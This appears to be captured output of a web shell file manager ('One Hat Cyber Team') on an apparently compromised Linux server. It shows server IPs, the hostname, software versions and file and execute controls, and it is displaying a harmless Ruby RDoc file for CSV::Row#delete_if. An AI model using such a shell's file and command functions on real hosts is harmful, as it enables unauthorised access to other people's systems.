⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.189
Server IP:
109.199.105.153
Server:
Linux connect.inboxifs.com 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
ri
/
3.0.0
/
system
/
CSV
/
Row
/
View File Name :
delete_if-i.ri
U:RDoc::AnyMethod[iI"delete_if:ETI"CSV::Row#delete_if;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"IRemoves fields from +self+ as selected by the block; returns +self+.;To:RDoc::Markup::BlankLine o; ; [I"CRemoves each field for which the block returns a truthy value:;To:RDoc::Markup::Verbatim; [I".source = "Name,Name,Name\nFoo,Bar,Baz\n" ;TI".table = CSV.parse(source, headers: true) ;TI"row = table[0] ;TI"Grow.delete_if {|header, value| value.start_with?('B') } # => true ;TI"'row # => #<CSV::Row "Name":"Foo"> ;TI"Irow.delete_if {|header, value| header.start_with?('B') } # => false ;T:@format0o; ; [I"4If no block is given, returns a new Enumerator:;To;; [I"Irow.delete_if # => #<Enumerator: #<CSV::Row "Name":"Foo">:delete_if>;T; 0: @fileI"lib/csv/row.rb;T:0@omit_headings_from_table_of_contents_below0I"2row.delete_if {|header, value| ... } -> self ;T0[ I" (&block);T@ FI"Row;TcRDoc::NormalClass00